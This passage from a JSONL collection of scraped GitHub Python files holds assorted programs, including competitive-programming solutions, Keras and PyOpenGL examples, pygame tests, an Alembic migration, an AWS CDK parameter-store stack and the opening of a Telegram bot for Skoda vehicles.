plt.show()\n","repo_name":"kcsayem/Parallelization-of-bandit-algorithms-to-reduce-computational-cost-of-news-article-recommendation-sys","sub_path":"old/linucb_linear.py","file_name":"linucb_linear.py","file_ext":"py","file_size_in_byte":6708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18810394587","text":"import sys\r\ninput = sys.stdin.readline\r\nT = int(input().rstrip())\r\nfor _ in range(T):\r\n H, W, N = list(map(int,input().split()))\r\n flag = False\r\n for i in range(1, W+1):\r\n for j in range(1, H+1):\r\n N-=1\r\n if N == 0:\r\n if i <= 9:\r\n print(str(j)+'0'+str(i))\r\n else:\r\n print(str(j)+str(i))\r\n 
flag=True\r\n break\r\n if flag:\r\n break","repo_name":"ukjinlee66/PS","sub_path":"백준/Bronze/10250. ACM 호텔/ACM 호텔.py","file_name":"ACM 호텔.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20610902956","text":"from .roi_pooling_conv import RoiPoolingConv\nfrom tensorflow.keras.layers import Flatten, Dense, Dropout, TimeDistributed\n\n\ndef classifier_layer(base_layers, input_rois, num_rois, nb_classes):\n \"\"\"Classifier model\"\"\"\n\n pooling_regions = 7\n\n # TimeDistributed layers are used to process ROI areas independently\n # It is used the number of ROI's + an extra dimension (num_rois)\n # out_roi_pool is a list of 4 ROI (7x7x512)\n # out_roi_pool.shape = (1, num_rois, pool_size, pool_size, channels)\n out_roi_pool = RoiPoolingConv(pooling_regions, num_rois)([base_layers, input_rois])\n\n # Flatten out_roi_pool and connect to 2 Fully-Connected and 2 Dropout layers\n out = TimeDistributed(Flatten(name='flatten'))(out_roi_pool)\n out = TimeDistributed(Dense(4096, activation='relu', name='fc1'))(out)\n out = TimeDistributed(Dropout(0.5))(out)\n out = TimeDistributed(Dense(4096, activation='relu', name='fc2'))(out)\n out = TimeDistributed(Dropout(0.5))(out)\n\n # out_class: Class prediction\n out_class = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'),\n name='dense_class_{}'.format(nb_classes))(out)\n\n # out_regress: Coordinates predictions of the bounding boxes\n out_regress = TimeDistributed(Dense(4 * (nb_classes - 1), activation='linear', kernel_initializer='zero'),\n name='dense_regress_{}'.format(nb_classes))(out)\n\n return [out_class, out_regress]\n","repo_name":"darkhorrow/semantic-segmentation-tgc","sub_path":"faster-rncc/rbnd/rbnd_model/classifier_model.py","file_name":"classifier_model.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"26216750071","text":"# https://leetcode.com/problems/maximum-xor-for-each-query/\n# 1AC, no trick\nclass Solution:\n def getMaximumXor(self, nums: List[int], maximumBit: int) -> List[int]:\n mask = (1 << maximumBit) - 1\n cur = 0\n ax = []\n for x in nums:\n cur ^= x\n ax.append(cur)\n\n res = []\n n = len(nums)\n for i in range(n):\n res.append(mask ^ ax[n - 1 - i])\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1501-2000/1829_maximum-xor-for-each-query_1_AC.py","file_name":"1829_maximum-xor-for-each-query_1_AC.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"70392681833","text":"from pathlib import Path\nfrom unittest import mock\n\ntry:\n import jogo\nexcept ModuleNotFoundError:\n pass\n\ndef test_carregamento_fontes():\n with mock.patch('jogo.pygame') as mockg:\n mockg.font.get_default_font.side_effects = ['a', 'a']\n\n font1_mock = mock.Mock()\n font1_mock.render.return_value = 'OK1'\n font2_mock = mock.Mock()\n font2_mock.render.return_value = 'OK2'\n\n mockg.font.Font.side_effect = [\n font1_mock, font2_mock\n ]\n\n try:\n w, assets = jogo.inicializa()\n except (ValueError, TypeError):\n # Não retornou 2 elementos\n raise AssertionError('inicializa deverá retornar a janela criada (window) e o dicionário de recursos do jogo (assets)')\n\n assert type(assets) == dict, 'assets deve ser um dicionário.'\n for k in ['fonte_16', 'fonte_24']:\n assert k in 
assets, f'assets[\"{k}\"] não existe'\n\n assert assets['fonte_16'] != assets['fonte_24'], 'fonte_16 e fonte_24 são idênticos'\n assert assets['fonte_16'] == font1_mock or assets['fonte_16'] == font2_mock, 'fonte_16 não foi criado usando pygame.font.Font'\n assert assets['fonte_24'] == font1_mock or assets['fonte_24'] == font2_mock, 'fonte_16 não foi criado usando pygame.font.Font'\n\n\ndef test_desenho_fontes():\n font16_render = mock.Mock()\n font16_mock = mock.Mock()\n font16_mock.render.return_value = font16_render\n\n font24_render = mock.Mock()\n font24_mock = mock.Mock()\n font24_mock.render.return_value = font24_render\n\n assets = {\n 'fonte_16': font16_mock,\n 'fonte_24': font24_mock,\n }\n window = mock.Mock()\n\n with mock.patch('jogo.pygame') as mockg:\n jogo.desenha(window, assets)\n\n assert assets['fonte_16'].render.mock_calls == [mock.call('Fonte tamanho 16', True, (255, 255, 255))], 'A chamada a render na fonte de tamanho 16 não foi feita com os argumentos corretos.'\n assert assets['fonte_24'].render.mock_calls == [mock.call('Fonte tamanho 24', True, (0, 0, 255))], 'A chamada a render na fonte de tamanho 16 não foi feita com os argumentos corretos.'\n\n assert mock.call(font16_render, (10, 20)) in window.blit.mock_calls, 'O desenho do texto de fonte 16 foi feito incorretamente'\n assert mock.call(font24_render, (10, 70)) in window.blit.mock_calls, 'O desenho do texto de fonte 24 foi feito incorretamente'\n","repo_name":"prady001/projects","sub_path":"pygame/desenhando/exercises/texto_fontes/test_jogo.py","file_name":"test_jogo.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69948646312","text":"\"\"\"empty message\n\nRevision ID: 36d7a8641fd1\nRevises: cf986a7875ac\nCreate Date: 2020-06-02 20:37:40.752144\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '36d7a8641fd1'\ndown_revision = 'cf986a7875ac'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('high_commands',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('coach_id', sa.Integer(), nullable=False),\n sa.Column('level', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['coach_id'], ['coaches.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('coach_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('high_commands')\n # ### end Alembic commands ###\n","repo_name":"ttrnecka/imperium","sub_path":"migrations/versions/36d7a8641fd1_.py","file_name":"36d7a8641fd1_.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"37592047124","text":"# -*- coding: utf-8 -*-\n# **************************************************************************\n# *\n# * Authors: J.M. 
De la Rosa Trevin (jmdelarosa@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\n\nimport pyworkflow.object as pwobj\nfrom pyworkflow.gui.tree import TreeProvider\n\n\nclass SummaryProvider(TreeProvider):\n \"\"\"Create the tree elements for a Protocol run\"\"\"\n def __init__(self, protocol):\n TreeProvider.__init__(self)\n self.protocol = protocol\n self.getColumns = lambda: [('Name', 300), ('Output', 150),\n ('Number', 100)]\n self._parentDict = {}\n self.acquisition = []\n self.refreshObjects()\n\n def getObjects(self):\n return self._objects\n\n def refreshObjects(self):\n objects = []\n\n def addObj(objId, name, output='', size='', parent=None):\n obj = pwobj.Object(objId=objId)\n obj.name = name\n obj.output = output\n obj.outSize = size\n obj._objParent = parent\n objects.append(obj)\n return obj\n\n runs = [p.get() for p in self.protocol.inputProtocols]\n g = self.protocol.getProject().getGraphFromRuns(runs)\n\n nodes = g.getRoot().iterChildsBreadth()\n\n for n in nodes:\n prot = n.run\n pobj = addObj(prot.getObjId(),\n '%s (id=%s)' % (prot.getRunName(), prot.strId()))\n\n for outName, outSet in prot.iterOutputAttributes(pwobj.Set):\n outSet.load()\n outSet.loadAllProperties()\n addObj(outSet.getObjId(), '', outName, outSet.getSize(), pobj)\n outSet.close()\n # Store acquisition parameters in case of the import protocol\n from pyworkflow.em import ProtImportImages\n #NOTE by rmarabini do not use the angstrom symbol instead of A\n #it breaks html production in the monitor:\n #UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 \n if isinstance(prot, ProtImportImages):\n self.acquisition = [(\"Microscope Voltage: \",\n prot.voltage.get()),\n (\"Spherical aberration: \",\n prot.sphericalAberration.get()),\n (\"Magnification: \",\n prot.magnification.get()),\n (\"Pixel Size (A/px): \",\n outSet.getSamplingRate())\n ]\n\n self._objects = objects\n\n def getObjectInfo(self, obj):\n info = {'key': obj.strId(),\n 'parent': obj._objParent,\n 'text': obj.name,\n 'values': (obj.output, obj.outSize),\n 'open': True\n }\n\n return info\n","repo_name":"I2PC/scipion-web","sub_path":"pyworkflow/em/protocol/monitors/summary_provider.py","file_name":"summary_provider.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13600316418","text":"class MyHashSet:\n\n def __init__(self):\n self.N = 999\n self.mass = [[] for x in range(self.N)]\n\n def add(self, key: int) -> None:\n index = key % self.N\n for x in self.mass[index]:\n 
if x == key:\n                return\n        self.mass[index].append(key)\n        print(self.mass)\n\n    def remove(self, key: int) -> None:\n        index = key % self.N\n        for i, x in enumerate(self.mass[index]):\n            if x == key:\n                self.mass[index].pop(i)\n                return\n\n    def contains(self, key: int) -> bool:\n        index = key % self.N\n        for x in self.mass[index]:\n            if x == key:\n                return True\n        return False\n\n\n# Your MyHashSet object will be instantiated and called as such:\nobj = MyHashSet()\nobj.add(3)\nobj.remove(3)\n","repo_name":"Alset-Nikolas/Algorithms-Letcode","sub_path":"Easy/4/705.DesignHashSet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24215061710","text":"n = int(input())\n\ngroup_word = 0\nfor _ in range(n):\n    word = input()\n    error = 0\n    for index in range(len(word)-1):\n        if word[index] != word[index+1]:\n            new_word = word[index+1:]\n            if new_word.count(word[index])>0: # 남은 문자열에서 현재글자가 있을때\n                error += 1\n    if error==0:\n        group_word+=1\nprint(group_word)\n","repo_name":"kimsunwoo00/6-","sub_path":"백준 1316번.py","file_name":"백준 1316번.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
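The group-word check in the record above re-scans the remainder of the string with `count` every time the current character changes, which is quadratic in the word length. A sketch of an equivalent linear check that tracks previously seen characters in a set instead (the sample words are made up for illustration; this is not the record's code):

```python
def is_group_word(word: str) -> bool:
    seen = set()
    for prev, cur in zip(word, word[1:]):
        # A word fails if a character reappears after a different character
        # has been read in between, i.e. it was already "closed" earlier.
        if cur != prev and cur in seen:
            return False
        seen.add(prev)
    return True

words = ["happy", "nonintrusive", "aabbbccb"]
print(sum(is_group_word(w) for w in words))  # 1 (only "happy" qualifies)
```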
+{"seq_id":"35098586685","text":"#!/usr/bin/python3\nimport OpenGL.GL as GL\nimport pathlib\nimport sys\n\n# Get the package directory\npackage_dir = str(pathlib.Path(__file__).resolve().parents[2])\n# Add the package directory into sys.path if necessary\nif package_dir not in sys.path:\n sys.path.insert(0, package_dir)\n\nfrom py3d.core.base import Base\nfrom py3d.core.utils import Utils\n\n\nclass Example(Base):\n \"\"\" Render a single point \"\"\"\n def initialize(self):\n print(\"Initializing program...\")\n # Initialize program #\n # vertex shader code\n vs_code = \"\"\"\n void main()\n {\n gl_Position = vec4(0.0, 0.0, 0.0, 1.0);\n }\n \"\"\"\n # fragment shader code\n fs_code = \"\"\"\n out vec4 fragColor;\n void main()\n {\n fragColor = vec4(1.0, 1.0, 0.0, 1.0);\n }\n \"\"\"\n # Send code to GPU and compile; store program reference\n self.program_ref = Utils.initialize_program(vs_code, fs_code)\n # Set up vertex array object #\n vao_ref = GL.glGenVertexArrays(1)\n GL.glBindVertexArray(vao_ref)\n # render settings (optional) #\n # Set point width and height\n GL.glPointSize(10)\n\n def update(self):\n # Select program to use when rendering\n GL.glUseProgram(self.program_ref)\n # Renders geometric objects using selected program\n GL.glDrawArrays(GL.GL_POINTS, 0, 1)\n\n\n# Instantiate this class and run the program\nExample().run()\n\n","repo_name":"ax-va/PyOpenGL-Pygame-Stemkoski-Pascale-2021","sub_path":"py3d/examples/example-2-02-single-point.py","file_name":"example-2-02-single-point.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"38940463516","text":"import json\nimport os\nimport time\nfrom random import Random\n\nfrom redis import Redis\n\nREDIS_HOST = os.getenv('REDIS_SERVICE_HOST', 'localhost')\nREDIS_PORT = os.getenv('REDIS_SERVICE_PORT', '6379')\n\nr = Redis(host=REDIS_HOST, port=int(REDIS_PORT))\n\nwhile True:\n print('publishing events:')\n for i in range(5):\n event = {'wait': Random().randint(10, 20)}\n r.lpush('events', json.dumps(event))\n print(f'- {event}')\n\n print('')\n print('sleeping for 10s')\n time.sleep(10)\n print('')\n","repo_name":"scottzach1/Redis-Keda","sub_path":"publisher/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28484196614","text":"# https://leetcode.com/problems/palindrome-partitioning-ii/description/\n\nclass Solution:\n def minCut(self, s: str) -> int:\n def getPalindromes(l, r):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n palindromes[l].add(r)\n l -= 1\n r += 1\n \n palindromes = defaultdict(set)\n for i in range(len(s)):\n getPalindromes(i, i)\n getPalindromes(i, i + 1)\n \n @cache\n def minCuts(start):\n if start >= len(s):\n return -1\n \n cuts = inf\n for end in palindromes[start]:\n cuts = min(cuts, 1 + minCuts(end + 1))\n \n return cuts\n \n return minCuts(0)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_54/palindrome-partitioning-ii.py","file_name":"palindrome-partitioning-ii.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1437602380","text":"import sys, time, random\nfrom collections import deque, defaultdict\ninput = lambda : sys.stdin.readline().strip()\nintput = lambda : map(int, input().split())\nsys.setrecursionlimit(1 << 20)\n\n# this might 
unironically be the singular worst\n# program I have ever authored in my career.\ndef solve():\n global passed, log, st\n N, M = intput()\n A = [0] * (N+1)\n B = [0] * (N+1)\n indeg = [0] * (M+1)\n oudeg = [0] * (M+1)\n edges = defaultdict(set)\n prefs = [[set(), set()] for _ in range(M+1)]\n adj = [[] for _ in range(M+1)]\n adj2 = [[] for _ in range(M+1)]\n for i in range(1,N+1):\n a, b = intput()\n A[i], B[i] = a,b\n adj[a] += [b]\n adj2[b] += [a]\n prefs[a][0] |= {i}\n prefs[b][1] |= {i}\n edges[ (a,b) ] |= {i}\n indeg[b] += 1\n oudeg[a] += 1\n st = time.time()\n\n def getComps():\n vis = [0] * (M+1)\n res = defaultdict(set)\n def dfs(u, c):\n vis[u] = 1\n res[c].add(u)\n for ad in (adj, adj2): # extraordinarily dumb\n for v in ad[u]:\n if not vis[v]:\n dfs(v, c)\n for i in range(1, M+1):\n if not vis[i]:\n dfs(i, i)\n\n i = 0\n edgecomps = defaultdict(set)\n for comp in res.values():\n sq = set()\n for c in comp:\n for j in prefs[c][0]:\n sq.add(j)\n for j in prefs[c][1]:\n sq.add(j)\n if sq:\n edgecomps[i] = sq\n i += 1\n return edgecomps\n\n comps = getComps()\n def hunger(L):\n cur = set()\n for x in L:\n if A[x] not in cur:\n cur.add(A[x])\n elif B[x] not in cur:\n cur.add(B[x])\n return N - len(cur), cur\n\n ans = []\n done = [0] * (M+1)\n q = deque()\n for i in range(1, M+1):\n if indeg[i] == 0:\n q.append(i)\n reserve = list(range(1, M + 1))\n reserve.sort(key=lambda x: (indeg[x], -oudeg[x])) # no idea\n rc = 0\n while q or rc < M:\n if not q:\n for j in range(rc, M):\n r = reserve[j]\n if not done[r]:\n q.append(r)\n rc = j + 1\n break\n if not q: break\n u = q.popleft()\n pos = sorted(adj[u], key=lambda x: (-done[x], -oudeg[x], indeg[x]))\n if not done[u] and pos: # delete an edge\n done[u] = True\n v = pos[0]\n indeg[v] -= 1\n if indeg[v] <= 0 and not done[v]:\n q.append(v)\n try: ans += [edges[(u,v)].pop()]\n except: pass\n pos = sorted(pos[1:], key=lambda x: (-oudeg[x], -indeg[x]))\n for v in pos: # take edges\n if not done[v]:\n indeg[v] -= 1\n try: ans += [edges[(u, v)].pop()]\n except: pass\n if indeg[v] <= 0:\n done[v] = True\n q.append(v)\n done[u] = True\n\n def bubble(p=None):\n ans = []\n fp = set()\n if not p: p = range(1, N+1)\n for i in p:\n if A[i] not in fp:\n fp.add(A[i])\n ans += [i]\n elif B[i] not in fp:\n fp.add(B[i])\n ans += [i]\n else: # greedy swap\n for j in range(len(ans)): # bubble upwards or something\n # if swapping i,j would allow i to not be hungry, do it\n # no idea why this would work\n t = ans[:]\n tj = t[j]\n t[j] = i\n Q = hunger(t)[1]\n if len(Q) < len(fp): continue\n if A[tj] in Q and B[tj] in Q: continue\n if A[tj] not in Q:\n Q.add(A[tj])\n elif B[tj] not in Q:\n Q.add(B[tj])\n t += [tj]\n fp = Q\n ans = t\n break\n else:\n ans += [i]\n return N-len(fp), ans\n\n # def pfxmethod():\n # done = [0] * (M+1)\n # reserve = sorted(range(1, M+1), key=lambda x:(-(icp[x]==0), -ocp[x]))\n # for fs in range(1,N):\n # second = {}\n # for i in range(fs):\n # r = reserve[i]\n # for j in prefs[r][0]:\n # b = B[j]\n # for c in prefs[b][1]:\n #\n # ans += [r]\n\n def perCompCheese(its=20):\n tans = []\n for c in comps.values():\n c = list(c)\n bh = hunger(c)\n for j in range(its):\n p = c[:]\n random.shuffle(p)\n h = hunger(p)\n if h < bh:\n bh = h\n c = p\n tans += c\n return hunger(tans)[0], tans\n\n rem = set(range(1, N + 1)) - set(ans)\n ans += list(rem)\n h = hunger(ans)[0]\n\n if N <= 150:\n h2, ans2 = bubble()\n h3, ans3 = bubble(ans)\n if h2 < h:\n h = h2\n ans = ans2\n if h3 < h:\n h = h3\n ans = ans3\n for j in range(25):\n p = 
list(range(1,N+1))\n random.shuffle(p)\n h2, ans2 = bubble(p)\n h3 = hunger(p)[0]\n if h2 < h:\n h = h2\n ans = ans2\n if h3 < h:\n h = h3\n ans = p\n # else:\n # for j in range(1):\n # p = list(range(1, N + 1))\n # random.shuffle(p)\n # h2 = hunger(p)[0]\n # if h2 < h:\n # h = h2\n # ans = p\n\n its = 20 if N <= 150 else 1\n qwe, qwe2 = perCompCheese(its)\n if qwe < h:\n h = qwe\n ans = qwe2\n\n # ANS, EXS = check(A, B, N, M)\n # print('real ans:', ANS)\n # print('example: ', *EXS[0])\n # for e in EXS:\n # print(*e)\n # if h == ANS: passed += 1\n # elif LOG:\n # log.write(f\"{N} {M}\\n\")\n # for i in range(1, N+1):\n # log.write(f\"{A[i]} {B[i]}\\n\")\n # log.write(\"\\n\")\n\n # outf = open('/Users/henryliu/Desktop/DEBUG/py/77.out', 'w')\n # for e in EXS:\n # outf.write(' '.join(map(str,e)) + '\\n')\n # outf.close()\n return h, ans\n\nif __name__ == '__main__':\n st = 0\n c, s = solve()\n # print('time:', time.time() - st)\n print(c)\n for u in s:\n print(u)\n","repo_name":"henryliuser/hliu-cp","sub_path":"usaco/silver/cereal22.py","file_name":"cereal22.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"21543523272","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nclass Parameters:\n def __init__(self):\n \"\"\"\n Подклассы должны инициализировать атрибуты:\n self.prm параметрами и значениями по-умолчанию,\n self.type соответствующими типами,\n self.help соответствующими описаниями параметров.\n \"\"\"\n pass\n\n def ok(self):\n \"\"\"\n Проверяет определены ли аттрибуты prm, type и help.\n \"\"\"\n if hasattr(self, 'prm') and isinstance(self.prm, dict) and \\\n hasattr(self, 'type') and isinstance(self.type, dict) and \\\n hasattr(self, 'help') and isinstance(self.help, dict):\n return True\n else:\n raise ValueError(f'The constructor in class {self.__class__.__name__} does not initialize the dictionaries:\\n\\t self.prm, self.type, self.help')\n\n def _illegal_parameter(self, name):\n \"\"\"\n Генерирует исключение о недопустимом параметре.\n \"\"\"\n raise ValueError(f'Parameter {name} is not registred. 
\\nLegal parameters are \\n{list(self.prm.keys())}')\n\n def set(self, **parameters):\n \"\"\"\n Устанавливается один или несколько параметров.\n \"\"\"\n for name in parameters:\n if name in self.prm:\n self.prm[name] = parameters[name]\n else:\n self._illegal_parameter(name)\n\n def get(self, name):\n \"\"\"\n Возвращает значение одного или нескольких параметров.\n \"\"\"\n if isinstance(name, (list, tuple)):\n for n in name:\n if n not in self.prm:\n self._illegal_parameter(name)\n return [self.prm[n] for n in name]\n else:\n if name not in self.prm:\n self._illegal_parameter(name)\n return self.prm[name]\n\n def __getitem__(self, name):\n \"\"\"\n Допускается доступ к параметру по индексу obj[name].\n \"\"\"\n return self.get(name)\n\n def __setitem__(self, name, value):\n \"\"\"\n Допускается задание значения параметра по индексу obj[name] = value\n \"\"\"\n return self.set(name=value)\n\n def define_command_line_options(self, parser=None):\n self.ok()\n if parser is None:\n import argparse\n parser = argparse.ArgumentParser()\n\n for name in self.prm:\n tp = self.type[name] if name in self.prm else str\n help = self.help[name] if name in self.help else None\n parser.add_argument(\n '--' + name,\n default=self.get(name),\n metavar=name,\n type=tp,\n help=help\n )\n return parser\n\n def init_from_command_line(self, args):\n for name in self.prm:\n self.prm[name] = getattr(args, name)\n\n\nclass Material(Parameters):\n def __init__(self):\n self.prm = dict(Name='', Density=1000.,\n Tbf=0.0, Wtot=0.,\n Conductivity={'f': 2.11,'th':1.83},\n Capacity={'f': 2.02e6, 'th': 2.44e6})\n self.type = dict(Name=str, Density=float, Tbf=float, Wtot=float,\n Conductivity=dict, Capacity=dict)\n self.help = dict(Name='Name of material', Density='Dry density',\n Tbf='Freezing point', Wtot='Total moisture',\n Conductivity='Thermal conductivity:\"f\" - frozen state, \"th\" - thawed state',\n Capacity='Volumetric heat capacity:\"f\" - frozen state, \"th\" - thawed state')\n self.prm['Tbf_K'] = self.prm['Tbf'] + 273.15\n\n def set(self, **parameters):\n super().set(**parameters)\n self.prm['Tbf_K'] = self.prm['Tbf'] + 273.15\n\nclass Problem(Parameters):\n \"\"\"\n Физические параметры для задачи Стефана\n \"\"\"\n def __init__(self, Soil):\n self.prm = dict(H=20, M=Soil, Lw=3.34e5, A=10, T0=1.5, Tbnd=-27+273.15, T_end=300)\n self.prm['Tbf'] = self['M']['Tbf_K']\n self.prm['L'] = self['M']['Density']*self['M']['Wtot']*self['Lw']\n self.type = dict(H=float, M=Material, Lw=float, A=float, T0=float, Tbnd=float, T_end=int,\n Tbf=self['M'].help['Tbf'], L=float)\n self.help = dict(H='Depth of soil', M='Soil material', Lw='Latent heat of freezing of water',\n A='Smoothing coefficient', T0='Initial temperature of soil',\n Tbnd='Upper boundary temperature', T_end='End time of simulation',\n Tbf=self['M']['Tbf'], L='Volumetric latent heat of freezing of soil water')\n\n def w_u(self, T):\n T = np.array([T]) if not isinstance(T, np.ndarray) else T\n return np.where(T < self['Tbf'], 1./(1 + self['A']*(self['Tbf']-T)), 1.)\n\n def w_u_dT(self, T):\n T = np.array([T]) if not isinstance(T, np.ndarray) else T\n return np.where(T < self['Tbf'], self['A']/(1. 
+ self['A']*(self['Tbf']-T))**2, 0.)\n \n def C(self, T):\n Cf = self['M']['Capacity']['f']\n Cth = self['M']['Capacity']['th']\n return Cf + (Cf-Cth)*self.w_u(T)\n\n def lmbda(self, T):\n lmbdaf = self['M']['Conductivity']['f']\n lmbdath = self['M']['Conductivity']['th']\n return lmbdaf + (lmbdaf-lmbdath)*self.w_u(T)\n\n def C_eff(self, T):\n return self.C(T) + self['L']*self.w_u_dT(T)\n\n\n # def T_exact(self):\n\n","repo_name":"slemeshevsky/stefan","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43124220336","text":"import boto3\n\nfrom aws_cdk.core import (\n Construct,\n Stack,\n Tags,\n)\nfrom aws_cdk.aws_ssm import StringParameter\nfrom typing import Optional\n\nfrom openttd.enumeration import Maturity\n\ng_parameter_store = None # type: Optional[ParameterStoreStack]\nssm_client = boto3.client(\"ssm\")\n\n\nclass ParameterResult:\n def __init__(self, parameter, name):\n self.parameter = parameter\n self.name = name\n\n\nclass ParameterStoreStack(Stack):\n \"\"\"\n Stack to create SSM Parameters with.\n\n Parameters are created in a single stack, as many other stacks use the\n Parameters as input. For CloudFormation to work, those entries already\n have to exist before a stack can be created.\n \"\"\"\n\n def __init__(self, scope: Construct, id: str, *, maturity: Maturity, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n global g_parameter_store\n\n Tags.of(self).add(\"Stack\", \"Common-ParameterStore\")\n\n self._maturity = maturity.value\n\n if g_parameter_store is not None:\n raise Exception(\"Only a single ParameterStoreStack instance can exist\")\n g_parameter_store = self\n\n def get_parameter_name(self, name: str) -> str:\n return f\"/{self._maturity}{name}\"\n\n def add_string(self, name: str, default: str) -> ParameterResult:\n if not name.startswith(\"/\"):\n raise Exception(\"Please use a path for a parameter name\")\n parameter_name = self.get_parameter_name(name)\n\n parameter = StringParameter(\n self,\n parameter_name,\n string_value=default,\n parameter_name=parameter_name,\n )\n\n return ParameterResult(parameter, parameter_name)\n\n def add_secure_string(self, name: str) -> ParameterResult:\n if not name.startswith(\"/\"):\n raise Exception(\"Please use a path for a parameter name\")\n parameter_name = self.get_parameter_name(name)\n\n res = ssm_client.describe_parameters(ParameterFilters=[{\"Key\": \"Name\", \"Option\": \"Equals\", \"Values\": [parameter_name]}])\n if not len(res[\"Parameters\"]):\n print(f\"ERROR: create SecureString '{parameter_name}' manually (CloudFormation currently can't create those)\")\n\n parameter = StringParameter.from_secure_string_parameter_attributes(\n self,\n parameter_name,\n parameter_name=parameter_name,\n # 'version' is just a dummy value, as in our usage we only care\n # about the ASN (which is identical for every version).\n version=1,\n )\n\n return ParameterResult(parameter, parameter_name)\n\n\ndef add_string(name: str, default: str) -> ParameterResult:\n if g_parameter_store is None:\n raise Exception(\"No ParameterStoreStack instance exists\")\n\n return g_parameter_store.add_string(name, default=default)\n\n\ndef add_secure_string(name: str) -> ParameterResult:\n if g_parameter_store is None:\n raise Exception(\"No ParameterStoreStack instance exists\")\n\n return g_parameter_store.add_secure_string(name)\n\n\ndef get_parameter_name(name: str) -> 
str:\n if g_parameter_store is None:\n raise Exception(\"No ParameterStoreStack instance exists\")\n\n return g_parameter_store.get_parameter_name(name)\n","repo_name":"OpenTTD/aws-infra","sub_path":"openttd/stack/common/parameter_store.py","file_name":"parameter_store.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33858136050","text":"import os\nimport re\nimport requests\nimport telegram\nfrom telegram.ext import Application, CommandHandler, CallbackQueryHandler, ConversationHandler, MessageHandler, filters\nfrom core.connect_service import SkodaConnectService, get_vehicle_base_info\n\n\nTOKEN = os.getenv('TOKEN')\nCLIENT_ID = 'YOUR_CLIENT_ID'\nCLIENT_SECRET = 'YOUR_CLIENT_SECRET'\nREDIRECT_URI = 'YOUR_REDIRECT_URI'\n\n# Conversation states\nEMAIL, PASSWD, CAR_SELECTION, ACTION_SELECTION = range(4)\n\n\ndef vehicle_info_normalization(vehicle):\n vehicle_info = get_vehicle_base_info(vehicle)\n vehicle_name = f'{vehicle_info[\"model\"]} ' \\\n f'{vehicle_info[\"manufactured\"][0:4]} ' \\\n f'{vehicle_info[\"engine_capacity\"]} ' \\\n f'{vehicle_info[\"engine_type\"]}'\n return vehicle_name\n\n\ndef validate_email(email):\n return bool(re.match(r\"[^@]+@[^@]+\\.[^@]+\", email))\n\n\nasync def start(update, context):\n # authorization_url = get_authorization_url()\n user = update.effective_user\n\n if context.user_data:\n return ConversationHandler.END\n await update.message.reply_html(\n f'Привіт, {user.full_name}! \\n'\n f'З моєю допомогою ти можеш керувати своєю автівкою Skoda! \\n'\n '\\n'\n 